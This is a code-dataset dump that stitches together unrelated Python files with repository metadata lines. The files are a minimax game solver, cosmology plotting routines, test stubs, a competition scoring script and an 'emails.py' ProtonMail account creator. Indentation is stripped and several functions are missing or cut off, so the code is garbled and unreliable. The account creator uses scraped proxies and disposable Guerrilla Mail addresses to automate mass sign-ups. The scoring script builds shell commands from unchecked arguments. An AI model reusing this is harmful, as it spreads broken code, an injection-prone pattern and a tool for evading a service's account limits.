# Dynamic Tree : Tree has been built dynamically to avoid recomputations
from itertools import combinations
import copy
from random import randrange, sample
import sys
import string
import Queue as queue
import sys
import time
n = int(sys.argv[1])
initial = sys.argv[3]
minutes = int(sys.argv[4])
move_person = sys.argv[2]
temp_n = n
# print initial
# n = 3
start = [[0 for x in range(n)] for y in range(n+3)]
count = 0
for i in range(n+3-1,-1,-1):
for j in range(0,n):
start[i][j] = initial[count]
count = count + 1
#print start
#start[5][0] = 'x'
#print start
#test = [['x', 'o', 'x'], ['x', 'x', 'x'], ['o', 'o', 'o'], ['x', 'x', '.'], ['.', '.', '.'], ['.', '.', '.']]
# move_person = 'o'
#Successor Function
# Check Goal State
#p = Node(test)
#for succ in succesor(test):
# p.add_child(succ[1])
#for c in p.children:
# print c
# Building Trees Dynamically
def solve(state):
# level = [[0 for x in range(0,10)] for y in range(0,10)]
# print state
# level[0][0] = Node(state)
# print level[0][0].data
# print level[0]
global move_person
global temp_n
temp_person = move_person
for i in range(2,100,2):
level = [[0 for x in range(0,10)] for y in range(0,10)]
level[0][0] = Node(state)
for j in range(0,i,1):
if j%2 == 0:
move_person = 'x'
else:
move_person = 'o'
# print level[j]
count = 0
for elem in level[j]:
count = count + 1
if elem != 0:
# print elem.data
for succ in succesor(elem.data):
# print succ
p = Node(succ[1])
p.father_i = j
p.father_k = count-1
p.move = succ[0]
elem.add_child(p)
level[j+1].append(p)
if temp_person == 'x':
for elem in level[i]:
if elem!= 0:
elem.current_max = heuristic(elem.data)
else:
for elem in level[i]:
if elem!= 0:
elem.current_min = heuristic(elem.data)
if temp_person == 'x':
for m in range(i,0,-1):
for elem in level[m]:
if elem != 0:
if m%2 == 0:
if level[elem.father_i][elem.father_k].current_min > elem.current_max:
level[elem.father_i][elem.father_k].current_min = elem.current_max
else:
if level[elem.father_i][elem.father_k].current_max < elem.current_min:
level[elem.father_i][elem.father_k].current_max = elem.current_min
else:
for m in range(i,0,-1):
for elem in level[m]:
if elem != 0:
if m%2 == 0:
if level[elem.father_i][elem.father_k].current_max < elem.current_min:
level[elem.father_i][elem.father_k].current_max = elem.current_min
else:
if level[elem.father_i][elem.father_k].current_min > elem.current_max:
level[elem.father_i][elem.father_k].current_min = elem.current_max
if temp_person == 'x':
find = level[0][0].current_max
for elem in level[1]:
if elem!=0 and elem.current_min == find:
# print elem.data
# print 'Move:'
# print elem.move
# print elem.move,
str = ''
for i in range(temp_n+3-1,-1,-1):
for j in range(0,n):
str = str + elem.data[i][j]
print elem.move,
print str.replace(" ", "")
break
else:
find = level[0][0].current_min
for elem in level[1]:
if elem!=0 and elem.current_max == find:
# print elem.data
# print 'Move:'
# print elem.move,
# print ' ',
str = ''
for i in range(temp_n+3-1,-1,-1):
for j in range(0,n):
str = str + elem.data[i][j]
print elem.move,
print str.replace(" ", "")
break
# for elem in level[4]:
# if elem!=0:
# print elem.data,elem.current
solve(start)
| 54.773946 | 204 | 0.25007 |
3c80ebcea041e63107d9067c90a11c330c458c26 | 503 | py | Python | Triple predictor P3.6/generate_lines.py | oligogenic/DIDA_SSL | cbf61892bfde999eadf31db918833f6c75a5c9f3 | [
"MIT"
] | 1 | 2018-07-19T10:34:46.000Z | 2018-07-19T10:34:46.000Z | Triple predictor P3.6/generate_lines.py | oligogenic/DIDA_SSL | cbf61892bfde999eadf31db918833f6c75a5c9f3 | [
"MIT"
] | null | null | null | Triple predictor P3.6/generate_lines.py | oligogenic/DIDA_SSL | cbf61892bfde999eadf31db918833f6c75a5c9f3 | [
"MIT"
] | null | null | null | binary.memoize = {0: '0', 1: '1'}
n_f = 9
with open('command_lines.txt', 'w') as out:
for i in range(2**n_f):
out.write('/home/nversbra/anaconda3/envs/py36/bin/python random_forest.py dida_posey_to_predict.csv 100 50 1-1-1 %s\n' % get_binary_l(i, n_f))
| 33.533333 | 151 | 0.61829 |
3c81582355ba3220bcb59a6354b57fa7be7a46e7 | 17,422 | py | Python | angular_binning/snr_per_bin.py | robinupham/angular_binning | da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87 | [
"MIT"
] | null | null | null | angular_binning/snr_per_bin.py | robinupham/angular_binning | da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87 | [
"MIT"
] | null | null | null | angular_binning/snr_per_bin.py | robinupham/angular_binning | da3f6bf32efd8bad1a7f61a9a457f521ed8ebe87 | [
"MIT"
] | null | null | null | """
Functions for plotting the signal to noise per angular bin.
"""
import math
import os.path
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import angular_binning.like_cf_gauss as like_cf
DEG_TO_RAD = math.pi / 180.0
def plot_cl_cf(diag_she_cl_path, she_nl_path, lmin, lmax, theta_min, theta_max, n_theta_bin, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_dir=None):
"""
Produce plots of signal-to-noise per element for both the unbinned power spectrum and the binned correlation
function, using data produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
she_nl_path (str): Path to shear noise power spectrum as a text file.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_theta_bin (int): Number of theta bins.
survey_area_sqdeg (float): Survey area in square degrees, used to calculate the noise variance for the
correlation function.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin, used to calculate
the noise variance for the correlation function.
sigma_e (float): Intrinsic ellipticity dispersion per component, used to calculate the noise variance for the
correlation function.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_dir (str, optional): Directory to save the two plots into, if supplied. If not supplied, plots are
displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Add noise
n_ell = lmax - lmin + 1
nl = np.loadtxt(she_nl_path, max_rows=n_ell)
cls_ = cls_nonoise + nl
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
assert cls_.shape == (n_samp, n_ell)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
fid_cl = cls_[fid_idx, :]
ell = np.arange(lmin, lmax + 1)
fid_cl_err = np.sqrt(2 * fid_cl ** 2 / (2 * ell + 1))
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
# Plot all power spectra and the difference from the fiducial model
cl_fac = ell * (ell + 1) / (2 * np.pi)
for cl, dist_sig in zip(cls_, dist_sigma):
ax[0].plot(ell, cl_fac * cl, alpha=.5, color=colour.to_rgba(dist_sig))
ax[1].plot(ell, (cl - fid_cl) / fid_cl_err, alpha=.5, color=colour.to_rgba(dist_sig))
# Add a few cosmic variance error bars
err_ell = np.array([500, 1000, 1500, 2000])
err_ell_idx = err_ell - lmin
ax[0].errorbar(err_ell, cl_fac[err_ell_idx] * fid_cl[err_ell_idx],
yerr=(cl_fac[err_ell_idx] * 0.5 * fid_cl_err[err_ell_idx]), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (C_\ell)}$')
# Labels, legend and colour bar
ax[1].set_xlabel(r'$\ell$')
ax[0].set_ylabel(r'$C_\ell \times \ell (\ell + 1) ~ / ~ 2 \pi$')
ax[1].set_ylabel(r'$(C_\ell - C_\ell^\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(C_\ell)}$')
ax[0].ticklabel_format(axis='y', style='sci', scilimits=(0, 0))
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cl_perl.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
# Calculate theta range
theta_bin_edges = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta_bin + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus, _ = like_cf.get_cl2cf_matrices(theta_bin_edges, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec = cl2cf_22plus @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus = cl2cf_22plus[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf = cl2cf_22plus @ fid_cl + stabl_vec
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise = np.einsum('il,jl,l->ij', cl2cf_22plus, cl2cf_22plus, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta = np.cos(theta_bin_edges)
bin_area_new = 2 * np.pi * -1 * np.diff(cos_theta)
npairs = 0.5 * survey_area_sterad * bin_area_new * (gals_per_sterad ** 2) # Friedrich et al. eq 65
fid_cf_noise_var = 2 * sigma_e ** 4 / npairs
fid_cf_err = np.sqrt(np.diag(fid_cf_cov_nonoise) + fid_cf_noise_var)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
bin_edges_deg = np.degrees(theta_bin_edges)
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf = cl2cf_22plus @ cl + stabl_vec
cf_diff = (cf - fid_cf) / fid_cf_err
line_args = {'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0].step(bin_edges_deg, np.pad(cf, (0, 1), mode='edge'), where='post', **line_args)
ax[1].step(bin_edges_deg, np.pad(cf_diff, (0, 1), mode='edge'), where='post', **line_args)
# Add error bars
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
ax[0].errorbar(bin_centres_deg, fid_cf, yerr=(0.5 * fid_cf_err), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (\xi+)}$')
# Labels, legend and colour bar
plt.xscale('log')
ax[1].set_xlabel(r'$\theta$ (deg)')
ax[0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cf_perbin.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def plot_cf_nbin(diag_she_cl_path, lmin, lmax, theta_min, theta_max, n_bin_1, n_bin_2, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_path=None):
"""
Plots signal-to-noise per bin for the full-sky correlation function for two numbers of bins side-by-side, using data
produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_bin_1 (int): Number of theta bins in the left panel.
n_bin_2 (int): Number of theta bins in the right panel.
survey_area_sqdeg (float): Survey area in square degrees.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin.
sigma_e (float): Intrinsic ellipticity dispersion per component.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_path (str, optional): Path to save the plot, if supplied. If not supplied, plot is displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
ell = np.arange(lmin, lmax + 1)
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Calculate theta range
theta_bin_edges_1 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_1 + 1)
theta_bin_edges_2 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_2 + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus_1, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_1, lmin, l_extrap_to)
_, cl2cf_22plus_2, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_2, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec_1 = cl2cf_22plus_1 @ fid_cl_extrap
stabl_vec_2 = cl2cf_22plus_2 @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus_1 = cl2cf_22plus_1[:, :(lmax - lmin + 1)]
cl2cf_22plus_2 = cl2cf_22plus_2[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf_1 = cl2cf_22plus_1 @ fid_cl + stabl_vec_1
fid_cf_2 = cl2cf_22plus_2 @ fid_cl + stabl_vec_2
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise_1 = np.einsum('il,jl,l->ij', cl2cf_22plus_1, cl2cf_22plus_1, fid_cl_var)
fid_cf_cov_nonoise_2 = np.einsum('il,jl,l->ij', cl2cf_22plus_2, cl2cf_22plus_2, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta_1 = np.cos(theta_bin_edges_1)
cos_theta_2 = np.cos(theta_bin_edges_2)
bin_area_1 = 2 * np.pi * -1 * np.diff(cos_theta_1)
bin_area_2 = 2 * np.pi * -1 * np.diff(cos_theta_2)
npairs_1 = 0.5 * survey_area_sterad * bin_area_1 * (gals_per_sterad ** 2) # Friedrich et al. eq 65
npairs_2 = 0.5 * survey_area_sterad * bin_area_2 * (gals_per_sterad ** 2)
fid_cf_noise_var_1 = 2 * sigma_e ** 4 / npairs_1
fid_cf_noise_var_2 = 2 * sigma_e ** 4 / npairs_2
fid_cf_err_1 = np.sqrt(np.diag(fid_cf_cov_nonoise_1) + fid_cf_noise_var_1)
fid_cf_err_2 = np.sqrt(np.diag(fid_cf_cov_nonoise_2) + fid_cf_noise_var_2)
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, ncols=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.07, right=1, bottom=.07, top=.97, hspace=0, wspace=.12)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
bin_edges_deg_1 = np.degrees(theta_bin_edges_1)
bin_edges_deg_2 = np.degrees(theta_bin_edges_2)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf_1 = cl2cf_22plus_1 @ cl + stabl_vec_1
cf_2 = cl2cf_22plus_2 @ cl + stabl_vec_2
cf_diff_1 = (cf_1 - fid_cf_1) / fid_cf_err_1
cf_diff_2 = (cf_2 - fid_cf_2) / fid_cf_err_2
step_args = {'where': 'post', 'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0, 0].step(bin_edges_deg_1, np.pad(cf_1, (0, 1), mode='edge'), **step_args)
ax[0, 1].step(bin_edges_deg_2, np.pad(cf_2, (0, 1), mode='edge'), **step_args)
ax[1, 0].step(bin_edges_deg_1, np.pad(cf_diff_1, (0, 1), mode='edge'), **step_args)
ax[1, 1].step(bin_edges_deg_2, np.pad(cf_diff_2, (0, 1), mode='edge'), **step_args)
# Add error bars
log_bin_edges_deg_1 = np.log(bin_edges_deg_1)
log_bin_edges_deg_2 = np.log(bin_edges_deg_2)
bin_log_centres_deg_1 = np.exp(log_bin_edges_deg_1[:-1] + 0.5 * np.diff(log_bin_edges_deg_1))
bin_log_centres_deg_2 = np.exp(log_bin_edges_deg_2[:-1] + 0.5 * np.diff(log_bin_edges_deg_2))
error_args = {'lw': 2, 'c': 'black', 'zorder': 5, 'capsize': 5, 'ls': 'None',
'label': r'Cosmic variance + noise $\sqrt{Var (\xi+)}$'}
ax[0, 0].errorbar(bin_log_centres_deg_1, fid_cf_1, yerr=(0.5 * fid_cf_err_1), **error_args)
ax[0, 1].errorbar(bin_log_centres_deg_2, fid_cf_2, yerr=(0.5 * fid_cf_err_2), **error_args)
# Log scale and axis labels
plt.xscale('log')
ax[1, 0].set_xlabel(r'$\theta$ (deg)')
ax[1, 1].set_xlabel(r'$\theta$ (deg)')
ax[0, 0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1, 0].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
# Panel labels
annot_args = {'xy': (.95, .95), 'xycoords': 'axes fraction', 'ha': 'right', 'va': 'top', 'fontsize': 14}
ax[0, 0].annotate(f'{n_bin_1} $\\theta$ bin{"s" if n_bin_1 > 1 else ""}', **annot_args)
ax[0, 1].annotate(f'{n_bin_2} $\\theta$ bin{"s" if n_bin_2 > 1 else ""}', **annot_args)
# Colour bar
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_path is not None:
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def get_extrap_mat(lmin, lmax_in, l_extrap_to):
"""
Generate the power spectrum extrapolation matrix, which is used to extrapolate the power spectrum to high l
to stabilise the Cl-to-CF transform.
This matrix should be (pre-)multiplied by the fiducial power spectrum, then all (pre-)multiplied by the Cl-to-CF
transformation matrix, to produce a 'stabilisation vector' which can be added to any correlation function vector to
stabilise it. Generally the same stabilisation vector should be used for all points in parameter space, to avoid
biases. Note that the extrapolation matrix zeros all power below lmax_in, i.e. it does not give a concatenation of
the original power spectrum and the extrapolated section, but just solely the extrapolated section.
The extrapolation is linear with an l(l+1) weighting, achieved using a block matrix. See extrapolation_equations.pdf
for the derivation of its elements.
Args:
lmin (int): Minimum l in the power spectrum.
lmax_in (int): Maximum l prior to extrapolation.
l_extrap_to (int): Maximum l to which to extrapolate.
Returns:
2D numpy array: Extrapolation matrix.
"""
zero_top = np.zeros((lmax_in - lmin + 1, lmax_in - lmin + 1))
zero_bottom = np.zeros((l_extrap_to - lmax_in, lmax_in - lmin + 1 - 2))
ell_extrap = np.arange(lmax_in + 1, l_extrap_to + 1)
penul_col = (-ell_extrap + lmax_in) * lmax_in * (lmax_in - 1) / (ell_extrap * (ell_extrap + 1))
final_col = (ell_extrap - lmax_in + 1) * lmax_in * (lmax_in + 1) / (ell_extrap * (ell_extrap + 1))
extrap_mat = np.block([[zero_top], [zero_bottom, penul_col[:, np.newaxis], final_col[:, np.newaxis]]])
return extrap_mat
| 47.862637 | 120 | 0.662438 |
3c821672ff666bf16f14e39715a6449abc332ecc | 1,182 | py | Python | tests/integration/test_use_cases/test_18_confirm_purchase.py | datacraft-dsc/starfish-py | 95ff24410f056e8e2d313c3af97439fe003e294a | [
"Apache-2.0"
] | 4 | 2019-02-08T03:47:36.000Z | 2019-10-17T21:45:23.000Z | tests/integration/test_use_cases/test_18_confirm_purchase.py | datacraft-dsc/starfish-py | 95ff24410f056e8e2d313c3af97439fe003e294a | [
"Apache-2.0"
] | 81 | 2019-02-09T01:01:51.000Z | 2020-07-01T08:35:07.000Z | tests/integration/test_use_cases/test_18_confirm_purchase.py | oceanprotocol/ocean-py | 318ad0de2519e61d0a301c040a48d1839cd82425 | [
"Apache-2.0"
] | 1 | 2021-01-28T12:14:03.000Z | 2021-01-28T12:14:03.000Z | """
test_18_confirm_purchase
As a developer building a service provider Agent for Ocean,
I need a way to confirm if an Asset has been sucessfully puchased so that
I can determine whether to serve the asset to a given requestor
"""
import secrets
import logging
import json
from starfish.asset import DataAsset
| 35.818182 | 91 | 0.764805 |
3c8705d494d8a3a52f621df0705a17180cb44780 | 1,230 | py | Python | blaze/expr/tests/test_datetime.py | vitan/blaze | 0cddb630ad1cf6be3967943337529adafa006ef5 | [
"BSD-3-Clause"
] | 1 | 2015-11-06T00:46:56.000Z | 2015-11-06T00:46:56.000Z | blaze/expr/tests/test_datetime.py | vitan/blaze | 0cddb630ad1cf6be3967943337529adafa006ef5 | [
"BSD-3-Clause"
] | null | null | null | blaze/expr/tests/test_datetime.py | vitan/blaze | 0cddb630ad1cf6be3967943337529adafa006ef5 | [
"BSD-3-Clause"
] | null | null | null | from blaze.expr import TableSymbol
from blaze.expr.datetime import isdatelike
from blaze.compatibility import builtins
from datashape import dshape
import pytest
| 29.285714 | 68 | 0.669919 |
3c8be6bc259868341293934801c28e199c01bfba | 1,539 | py | Python | dac4automlcomp/score.py | automl/dac4automlcomp | f1a8b4e2f0fc85ad19b86aa41856496732fed901 | [
"Apache-2.0"
] | null | null | null | dac4automlcomp/score.py | automl/dac4automlcomp | f1a8b4e2f0fc85ad19b86aa41856496732fed901 | [
"Apache-2.0"
] | null | null | null | dac4automlcomp/score.py | automl/dac4automlcomp | f1a8b4e2f0fc85ad19b86aa41856496732fed901 | [
"Apache-2.0"
] | null | null | null | import argparse
import os
import time
import gym
import warnings
# Parts of the code are inspired by the AutoML3 competition
from sys import argv, path
from os import getcwd
from os.path import join
verbose = True
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="The experiment runner for the DAC4RL track."
)
parser.add_argument(
"-t",
"--competition-track",
choices=['dac4sgd', 'dac4rl'],
help="DAC4SGD or DAC4RL",
default="dac4rl",
)
parser.add_argument(
"-i",
"--input-dir",
type=str,
default="",
help="",
)
parser.add_argument(
"-o",
"--output-dir",
type=str,
default="",
help="",
)
root_dir = getcwd()
print("Working directory:", root_dir)
args, unknown = parser.parse_known_args()
output_dir = os.path.abspath(args.output_dir)
if verbose:
print("Using output_dir: " + output_dir)
if not os.path.exists(args.output_dir):
print("Path not found:", args.output_dir)
os.makedirs(args.output_dir)
if os.path.exists(args.output_dir):
print("Output directory contents:")
os.system("ls -lR " + args.output_dir)
if os.path.exists(args.input_dir):
os.system("cp " + args.input_dir + "/res/scores.txt " + args.output_dir)
else:
print("No results from ingestion!")
with open(args.output_dir + '/scores.txt', 'r') as fh:
print(fh.readlines())
| 23.676923 | 80 | 0.59974 |
3c8c318c871167bf3f056e1a05ea008558ab1c56 | 78 | py | Python | tests/test_test.py | Smirenost/volga | 109191ee994e99a831d90f3e8aa1d82fc766ca8b | [
"MIT"
] | 1 | 2020-11-05T23:40:02.000Z | 2020-11-05T23:40:02.000Z | tests/test_test.py | Smirenost/volga | 109191ee994e99a831d90f3e8aa1d82fc766ca8b | [
"MIT"
] | 3 | 2020-11-05T23:46:34.000Z | 2020-11-12T22:42:12.000Z | tests/test_test.py | Smirenost/volga | 109191ee994e99a831d90f3e8aa1d82fc766ca8b | [
"MIT"
] | null | null | null | from volga.json import foo_test
| 13 | 31 | 0.692308 |
3c8d359a9fdb99a983fada9faf82eacea1c12723 | 11,067 | py | Python | emails.py | kotx/proton-vpn-account-generator | 8f99093cdf1d0244a91493a09d2e37a02721d144 | [
"MIT"
] | 5 | 2020-04-03T13:57:07.000Z | 2022-03-11T03:20:14.000Z | emails.py | kotx/proton-vpn-account-generator | 8f99093cdf1d0244a91493a09d2e37a02721d144 | [
"MIT"
] | 2 | 2020-10-15T20:26:44.000Z | 2021-05-29T09:36:10.000Z | emails.py | kotx/proton-vpn-account-generator | 8f99093cdf1d0244a91493a09d2e37a02721d144 | [
"MIT"
] | 5 | 2020-04-03T13:57:08.000Z | 2022-01-23T08:52:16.000Z | # This Project is in it's early stages of Development.
# Working on new features and main menu.
# Any Questions or Suggestions please Mail to: hendriksdevmail@gmail.com
# Version: 1.0.0
from selenium import webdriver
from colorama import Fore, Back, Style
import warnings
import time
import random
import string
import urllib.request
import requests
import csv
import sys
from proxyscrape import create_collector
import os
clear = lambda: os.system('clear')
clear()
collector = create_collector('my-collector', 'https')
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
time.sleep(15)
restart = 2
while (restart > 1):
# Pick an email for Verification. Replace 'YourEmail@Mail.com' with an email adress. (You can use 10min mail for this)
# verifymail = input('\033[31m' + "Enter Email Adress for Verification: " + '\033[0m')
verifymail = ''
# f = open('./input_emails.txt')
# verifymail = f.readline().trim()
# verifymail = 'itlammhewuicxfmhco@ttirv.org'
# Pick an email for Notification. Replace 'YourEmail@Mail.com' with an email adress. (You can use 10min mail for this)
# notifymail = input('\033[31m' + "Enter Email Adress for Recovery: " + '\033[0m')
notifymail = ''
# notifymail = 'itlammhewuicxfmhco@ttirv.org'
proxy_status = "false"
while (proxy_status == "false" and False):
# Retrieve only 'us' proxies
proxygrab = collector.get_proxy({'code': ('in')})
proxy = ("{}:{}".format(proxygrab.host, proxygrab.port))
print ('\033[31m' + "Proxy:", proxy + '\033[0m')
try:
proxy_host = proxygrab.host
proxy_port = proxygrab.port
proxy_auth = ":"
proxies = {'http':'http://{}@{}:{}/'.format(proxy_auth, proxy_host, proxy_port)}
requests.get("http://example.org", proxies=proxies, timeout=1.5)
except OSError:
print ('\033[31m' + "Proxy Connection error!" + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "false"
else:
print ('\033[31m' + "Proxy is working..." + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "true"
else:
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.select import Select
warnings.filterwarnings("ignore", category=DeprecationWarning)
options = Options()
email_driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
email_url = 'https://www.guerrillamail.com/'
email_driver.get(email_url)
time.sleep(4)
# # print(driver.find_element_by_id('inbox-id').text)
email = email_driver.find_element_by_id('inbox-id').text + '@';
domain_name = Select(email_driver.find_element_by_id('gm-host-select')).first_selected_option.text
# # domain_name = email_driver.find_element_by_id('gm-host-select').text
email += domain_name
# print(domain_name)
print(email)
# f = open('./input_emails.txt', 'w')
# f.write(email)
verifymail = email
# email_driver.find_element_by_partial_link_text('verification').click()
# options.add_argument('--proxy-server={}'.format(proxy))
# Change Path to Chrome Driver Path (or move your ChromeDriver into the project folder)
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
# url = 'http://protonmail.com/signup'
